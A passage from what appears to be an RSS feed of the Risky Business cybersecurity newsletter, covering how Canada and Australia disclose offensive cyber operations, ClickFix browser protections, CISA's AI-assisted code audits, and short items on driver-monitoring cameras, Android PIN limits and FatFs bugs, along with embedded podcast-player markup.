members&quot;.</p><p>These case studies sound similar in many ways to other Five Eyes operations. Last year <a href="https://news.risky.biz/why-america-needs-its-own-salt-typhoon/#bulletproof-zservers-is-having-well-a-bad-time"><u>Australia revealed</u></a> a similar action targeting Russian bulletproof hosting company Zservers. Like CSE&apos;s various efforts, Australia&apos;s operation involved meticulous research and planning to get the biggest bang for its buck&#x2026; it wiped Zservers&apos; computers while its employees were out drinking so that the company&apos;s incident response would be impeded.&#xA0;</p><p>But while the operations themselves appear to share the same meticulous approach, how they are revealed to the public could not be more different.</p><p>Starting with its 2023-24 report, the CSE began describing active cyber operations, increasing the level of detail in each subsequent report. That first report noted the organisation had carried out a series of active operations that &quot;helped to tackle cybercrime at its roots&quot;.&#xA0;</p><p>The sky didn&#x2019;t fall in, so the 2024-25 report included a bit more information. It said the organisation used active cyber operations to counter a violent extremist organisation, including by &quot;damag[ing] the credibility and influence of key group leaders, reducing their ability to inspire and lead&quot;.&#xA0;</p><p>By contrast, Australian disclosures have been a bit more colourful, coming to light <a href="https://www.lowyinstitute.org/video/mike-burgess-director-general-australian-signals-directorate-asd"><u>either in speeches</u></a> or through the media <a href="https://www.smh.com.au/politics/federal/five-russians-went-out-drinking-when-they-got-back-australia-had-struck-20250212-p5lbfn.html"><u>via feature reports</u></a> or <a href="https://iview.abc.net.au/show/breaking-the-code-cyber-secrets-revealed/video/NS2337H001S00"><u>documentaries</u></a>. We do love the insights these types of disclosures provide.</p><p>But&#x2026; why can&apos;t we have both? The media features that paint a striking picture of impressive, carefully orchestrated takedowns <em>and</em> annual reports that make the operations seem just another part of the daily grind?&#xA0;&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/lc5kMZjTLk4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Srsly Risky Biz: US Supreme Court undermines Section 702 intel"></iframe></figure><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>ClickFix protection comes to the Opera browser:</strong> Opera <a href="https://blogs.opera.com/security/2026/07/how-opera-paste-protect-guards-against-clipboard-attacks/"><u>announced it has</u></a> rolled out protections against <a href="https://www.proofpoint.com/au/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape"><u>ClickFix attacks</u></a> that compromise users by convincing them to execute malicious code on their own computers by pasting it from the clipboard into a terminal window. Opera&apos;s browser will intercept malicious commands and stop them ending up in the clipboard. The uBlock origin ad blocker <a href="https://cyberinsider.com/ublock-origin-chrome-extension-now-blocks-known-clickfix-sites/"><u>has also added some rules</u></a> to stop ClickFix popups.&#xA0;</li><li><strong>CISA gets Mythos:</strong> The US cybersecurity agency is using Anthropic&apos;s Mythos model to audit government software for vulnerabilities, as <a href="https://www.reuters.com/world/us-cyber-agency-is-using-anthropics-mythos-audit-government-code-sources-say-2026-07-06/"><u>reported by <em>Reuters</em></u></a><em>. </em>These audits have already uncovered many vulnerabilities, per <em>Reuters</em> sources. Welcome to the bugpocalyse, CISA!</li><li><strong>Restaffing CISA may be on the cards:</strong> Over the last couple of weeks there have <a href="https://cyberscoop.com/russell-vought-cisa-staffing-trump-budget-cuts/"><u>been a number</u></a> of stories indicating <a href="https://cyberscoop.com/dhs-secretary-markwayne-mullin-pinpoints-optimal-cisa-staffing-levels/"><u>that maybe</u></a> the Trump administration will increase staffing levels at CISA. It&apos;s almost as if a once in a lifetime avalanche of AI-discovered vulnerabilities may require more, not fewer, personnel to address.&#xA0;&#xA0;&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Catalin Cimpanu talks with Alex Orleans, Head of Threat Intelligence at Sublime Security, about the increase in email attacks leveraging Zoom invites and other video conferencing tools.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI119.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI119/&quot;&gt;Sponsored: Sublime Security on Zoom attacks&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 14:17 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Sublime Security on Zoom attacks&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss the growing delta between bugs lots and lots of bugs being discovered and the number of devastating hacks.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN173.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN173/&quot;&gt;Between Two Nerds: Why AI has not meant more hacks. Yet.&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 32:14 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Why AI has not meant more hacks. Yet.&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/Lj2B2Q_Vadk?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Why AI has not meant more hacks. Yet."></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>All new cars to include a camera aimed at the driver&apos;s face: </strong>All new cars manufactured and sold in the EU and US will have to include a mandatory infrared camera aimed at the driver&apos;s face, alarming some privacy groups.</p><p>The infrared camera tracks the driver&apos;s head position and eye movements and provides an alert when it registers the eyes going off the road.&#xA0;</p><p>The new regulation came into effect <a href="https://www.inkl.com/news/new-eu-car-safety-rules-take-effect-7-july-how-your-car-could-monitor-you"><u>in the EU</u></a> on Monday and will start next year <a href="https://www.gadgetreview.com/federal-surveillance-tech-becomes-mandatory-in-new-cars-by-2027"><u>in the US</u></a>. In the EU, the new camera requirement is part of the bloc&apos;s second General Safety Regulation (GSR2), a broader swath of new safety rules introduced for the auto industry and designed to improve road safety.</p><p>[<a href="https://news.risky.biz/risky-bulletin-all-new-cars-to-include-a-camera-aimed-at-the-drivers-face/https://news.risky.biz/risky-bulletin-all-new-cars-to-include-a-camera-aimed-at-the-drivers-face/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Android drops PIN guessing limit from 1,800 attempts to 20:</strong> Android 17, released last month, has shipped with stricter protections against lockscreen PIN and password guessing attacks.</p><p>Google has reduced the maximum number of failed attempts from 1,800 to 20, and the timeouts between failed attempts are now considerably more aggressive.&#xA0;</p><p>[<a href="https://news.risky.biz/risky-bulletin-android-drops-pin-guessing-limit-from-1-800-attempts-to-just-20/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>FatFs bugs enable physical access attacks on a load of devices: </strong>The developers of a lot of industrial gear and smart devices will have their work cut out for them over the coming months and years to deploy protections against a set of newly discovered and unpatched bugs in the FatFs filesystem driver.</p><p>The seven bugs, discovered by security firm <a href="https://www.runzero.com/blog/fatfs-bugs/"><u>runZero</u></a>, can allow an attacker to use a crafted filesystem image to cause a memory corruption that runs malicious code to jailbreak a targeted device.</p><p>Devices that use FatFs for their filesystem are all impacted.</p><p>[<a href="https://news.risky.biz/risky-bulletin-fatfs-bugs-enable-physical-access-attacks-on-a-load-of-devices/"><u>more</u></a> on <em>Risky Bulletin</em>]</p>
  103. Srsly Risky Biz: America Won't Beat the Distillation Ecosystem

    Thu, 02 Jul 2026 05:12:51 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://corelight.com/"><em><u>Corelight</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-f9964c89-9010-4b38-aaea-b0b85a1f1a8c-1.jpeg" alt="Srsly Risky Biz: America Won&apos;t Beat the Distillation Ecosystem"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Patrick Gray and Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://corelight.com/"><em><u>Corelight</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB173.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB173/&quot;&gt;Srsly Risky Biz: America won&apos;t beat the distillation ecosystem&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 30:02 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a 